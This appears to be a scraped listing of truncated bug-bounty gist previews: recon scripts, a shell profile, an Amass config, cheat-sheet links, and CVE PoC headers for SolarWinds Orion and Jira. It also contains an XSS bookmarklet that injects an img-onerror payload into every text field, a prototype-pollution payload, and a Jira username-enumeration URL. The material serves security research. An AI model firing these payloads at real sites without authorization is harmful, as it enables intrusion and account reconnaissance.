| #!/bin/bash | |
| # Initiate new BBRF programs from your public and private HackerOne programs | |
| h1name="<your-hackerone-username>" | |
| apitoken="<your-hackerone-api-token>" | |
| next='https://api.hackerone.com/v1/hackers/programs?page%5Bsize%5D=100' | |
| while [ "$next" ]; do |
| using namespace System.Management.Automation | |
| using namespace System.Management.Automation.Language | |
| if ($host.Name -eq 'ConsoleHost') | |
| { | |
| Import-Module PSReadLine | |
| } | |
| #Import-Module PSColors | |
| #Import-Module posh-git | |
| Import-Module -Name Terminal-Icons |
| javascript:(function(){for (var t = document.getElementsByTagName("input"), e = 0; e < t.length; e++) "text" == t[e].getAttribute("type") && (t[e].value = '"><img src onerror=alert(document.domain)>')})();void(0) |
Read proper write-up here: https://publish.whoisbinit.me/subdomain-takeover-on-api-techprep-fb-com-through-aws-elastic-beanstalk
I have included my script in another file (main.sh), which I used in discovering this vulnerability.
I didn't do any form of manual work in finding this vulnerability, and my workflow was fully automated with Bash scripting.
I have shortened my actual script, and only included the part which helped me in finding this vulnerability in the main.sh file.
| (() => { | |
| let gadgets = []; | |
| if (typeof _satellite !== 'undefined') { | |
| gadgets.push('Adobe Dynamic Tag Management'); | |
| } | |
| if (typeof BOOMR !== 'undefined') { | |
| gadgets.push('Akamai Boomerang'); | |
| } |
| # CVE-2020-10148 (local file disclosure PoC for SolarWinds Orion aka door to SuperNova ? ) | |
| # @0xSha | |
| # (C) 2020 0xSha.io | |
| # Advisory : https://www.solarwinds.com/securityadvisory | |
| # Mitigation : https://downloads.solarwinds.com/solarwinds/Support/SupernovaMitigation.zip | |
| # Details : https://kb.cert.org/vuls/id/843464 | |
| # C:\inetpub\SolarWinds\bin\OrionWeb.DLL | |
| # According to SolarWinds.Orion.Web.HttpModules |
| cve-2019-8449 | |
| The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability. | |
| https://jira.atlassian.com/browse/JRASERVER-69796 | |
| https://victomhost/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true | |
| ===================================================================================================================================== |
__proto__[onload]=alert(1)vulnerable code(file: http://embed.redditmedia.com/widgets/platform.js):
n.prototype.init = function(a, b, c, d) {
if (this.elem = b,
this.options = c,
!c.url)
| 🔥Complete Bug Bounty Cheat Sheet🔥 | |
| XSS | |
| https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md | |
| https://github.com/ismailtasdelen/xss-payload-list | |
| SQLi | |
| https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/sqli.md |
| # Copyright 2017-2020 Jeff Foley. All rights reserved. | |
| # Use of this source code is governed by Apache 2 LICENSE that can be found in the LICENSE file. | |
| # Should results only be collected passively and without DNS resolution? Not recommended. | |
| #mode = passive | |
| mode = active | |
| # The directory that stores the Cayley graph database and other output files | |
| # The default for Linux systems is: $HOME/.config/amass | |
| #output_directory = amass |